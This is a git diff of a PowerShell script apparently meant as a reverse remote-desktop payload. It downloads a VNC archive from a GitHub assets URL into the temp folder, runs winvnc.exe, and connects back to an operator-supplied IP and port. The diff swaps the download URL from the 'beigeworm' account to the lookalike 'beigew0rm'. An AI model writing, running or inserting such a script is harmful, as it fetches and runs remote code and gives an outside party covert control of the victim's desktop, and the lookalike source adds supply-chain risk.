diff --git a/Uvnc-Remote-Desktop/main.ps1 b/Uvnc-Remote-Desktop/main.ps1 index 5694287..c954056 100644 --- a/Uvnc-Remote-Desktop/main.ps1 +++ b/Uvnc-Remote-Desktop/main.ps1 @@ -20,7 +20,7 @@ $ip = "$ip" $port = '8080' $tempFolder = "$env:temp\vnc" -$vncDownload = "https://github.com/beigeworm/assets/raw/main/winvnc.zip" +$vncDownload = "https://github.com/beigew0rm/assets/raw/main/winvnc.zip" $vncZip = "$tempFolder\winvnc.zip" if (!(Test-Path -Path $tempFolder)) { @@ -38,4 +38,4 @@ rm -Path $vncZip -Force $proc = "$tempFolder\winvnc.exe" Start-Process $proc -ArgumentList ("-run") sleep 2 -Start-Process $proc -ArgumentList ("-connect $ip::$port") \ No newline at end of file +Start-Process $proc -ArgumentList ("-connect $ip::$port")